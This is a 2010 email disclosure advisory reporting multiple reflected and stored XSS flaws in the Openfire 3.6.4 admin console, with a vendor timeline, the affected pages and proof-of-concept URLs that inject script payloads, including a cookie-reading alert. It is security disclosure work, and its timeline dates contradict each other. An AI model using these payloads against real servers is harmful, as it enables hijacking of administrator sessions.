Hi,

This is regarding multiple XSS Vulnerabilities in Openfire 3.6.4
Administrative Section. The following is the disclosure document:

Title: Multiple XSS Vulnerabilities in Openfire 3.6.4 Administrative
Section
------------------------------------------------------------------------
------------------------------------------------------------------------
--

Project: Openfire
Severity: High
Versions: 3.6.4 (other versions may be affected)
Exploit type: Multiple XSS
------------------------------------------------------------------------
------------------------------------------------------------------------
--

Timeline:
14 October 2010:  Vendor Contacted
15 October 2010:  Vendor Response received. Asks to verify the issues in
beta.
28 October 2010:  Informed Vendor that multiple pages are still
vulnerable
03 November 2010: Acknowledgement / Update requested
03 November 2010: Update received. No fixes initiated.
23 November 2010: Informed vendor disclosure date set to 1/12/2010
22 December 2010: Update requested.
22 December 2010: Vendor asks to release information as the
vulnerabilities are already known
23 December 2010: A different contact at the Vendor location informs
that there are no updates.
24 December 2010: Disclosure date set to 5 December 2010
05 December 2010: Public disclosure.
------------------------------------------------------------------------
------------------------------------------------------------------------
--

Product Description:
Openfire is a real time collaboration (RTC) server licensed under the
Open Source GPL. It uses the only widely adopted open protocol for
instant messaging, XMPP (also called Jabber). Openfire is incredibly
easy to setup and administer, but offers rock-solid security and
performance.
(Source: http://www.igniterealtime.org/projects/openfire/)
------------------------------------------------------------------------
------------------------------------------------------------------------
--

Affected Files/Locations/Modules:
login.jsp
security-audit-viewer.jsp
user-create.jsp
plugins/search/advance-user-search.jsp
user-roster-add.jsp
user-roster.jsp
group-create.jsp
group-edit.jsp
group-delete.jsp
muc-room-edit-form.jsp
muc-room-delete.jsp
plugins/clientcontrol/create-bookmark.jsp
plugins/clientcontrol/spark-form.jsp

------------------------------------------------------------------------
------------------------------------------------------------------------
--

Vulnerability Details:
User can insert HTML or execute arbitrary JavaScript code within the
vulnerable application. The vulnerabilities arise due to insufficient
input validation in multiple input fields throughout the application.
Successful exploitation of these vulnerabilities could result in, but
not limited to, compromise of the application, theft of cookie-based
authentication credentials, arbitrary page redirection, disclosure or
modification of sensitive data and phishing attacks.

Since the vulnerabilities exist in the administrative module, a
successful attack could cause a complete compromise of the entire
application. An attacker can send a link with the exploit to an
administrator whose access could compromise the application.
------------------------------------------------------------------------
------------------------------------------------------------------------
--

Proof of Concept:
Persistent XSS:
http://localhost:9090/login.jsp?url=&username=test"
onfocus=javascript:window.location.assign('http://www.google.com');">

http://localhost:9090/login.jsp?url=hello"
onfocus=javascript:window.location.assign('http://www.google.com');">
      
http://localhost:9090/security-audit-viewer.jsp?range=15&username="><scr
ipt>alert('xss')</script>&search=Search

http://localhost:9090/user-create.jsp?username=test"><script>alert('xss'
)</script>
http://localhost:9090/user-create.jsp?name=test"><script>alert('xss')</s
cript>
http://localhost:9090/user-create.jsp?email=test"><script>alert('xss')</
script>

http://localhost:9090/plugins/search/advance-user-search.jsp?criteria=te
st"><script>alert('xss')</script>

http://localhost:9090/user-roster-add.jsp?username=test<script>alert('xs
s')</script>
http://localhost:9090/user-roster-add.jsp?username=user&jid=1&nickname=<
script>alert('XSS')</script>&email=<script>alert('XSS')</script>&add=Add
+Item

http://localhost:9090/user-roster.jsp?username=test<script>alert(documen
t.cookie)</script>
http://localhost:9090/user-lockout.jsp?username=test<script>alert('xss')
</script>

http://localhost:9090/group-create.jsp?name=test<script>alert('xss')</sc
ript>&description=<script>alert('xss')</script>&create=Create+Group

http://localhost:9090/group-edit.jsp?creategroupsuccess=true&group=test<
script>alert('xss')</script>

http://localhost:9090/group-delete.jsp?group=<script>alert('xss')</scrip
t>


http://localhost:9090/muc-room-edit-form.jsp?save=true&create="><script>
alert('XSS')</script>&roomconfig_persistentroom="><script>alert('XSS')</
script>&roomName=23&mucName=conference&roomconfig_roomname=<script>alert
('XSS')</script>&roomconfig_roomdesc=<script>alert('XSS')</script>&room_
topic=<script>alert('XSS')</script>&roomconfig_maxusers="><script>alert(
'XSS')</script>&roomconfig_presencebroadcast=<script>alert('XSS')</scrip
t>true&roomconfig_presencebroadcast2="><script>alert('XSS')</script>&roo
mconfig_presencebroadcast3=true"><script>alert('XSS')</script>&roomconfi
g_roomsecret="><script>alert('XSS')</script>&roomconfig_roomsecret2="><s
cript>alert('XSS')</script>&roomconfig_whois=moderator"><script>alert('X
SS')</script>&roomconfig_publicroom=true"><script>alert('XSS')</script>&
roomconfig_canchangenick=true"><script>alert('XSS')</script>&roomconfig_
registration=true"><script>alert('XSS')</script>&Submit=Save+Changes

http://localhost:9090/muc-room-delete.jsp?roomJID="><script>alert('XSS')
</script>&create=false

http://localhost:9090/plugins/clientcontrol/create-bookmark.jsp?urlName=
"><script>alert('XSS')</script>&url="><script>alert('XSS')</script>&user
s="><script>alert('XSS')</script>&groups="><script>alert('XSS')</script>
&rss=off&createURLBookmark=Create&type=url

http://localhost:9090/plugins/clientcontrol/spark-form.jsp?optionalMessa
ge=</textarea><script>alert('XSS')</script>&submit=Update+Spark+Versions


Stored XSS:
http://localhost:9090/group-create.jsp
http://localhost:9090/group-summary.jsp
Method: Navigate to http://localhost:9090/group-create.jsp, and create a
new group with the following details.
Group Name: Test<script>alert("xss")</script>
Description: Test<script>alert("xss")</script> Click on Create Group,
you will be greeted with multiple alert boxes. Click on Group Summary
from the left pane or navigate to
http://localhost:9090/group-summary.jsp to be greeted again by multiple
alert boxes completing the PoC.
------------------------------------------------------------------------
------------------------------------------------------------------------
--

Warm Regards,
Riyaz Ahemed Walikar || Senior Engineer - Professional Services
Vulnerability Assessment & Penetration Testing
Microland Limited
www.microland.com


The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. 
Any review, re-transmission, dissemination or other use of or taking of any action in reliance upon,this information by persons or entities other than the intended recipient is prohibited. 
If you received this in error, please contact the sender and delete the material from your computer. 
Microland takes all reasonable steps to ensure that its electronic communications are free from viruses. 
However, given Internet accessibility, the Company cannot accept liability for any virus introduced by this e-mail or any attachment and you are advised to use up-to-date virus checking software.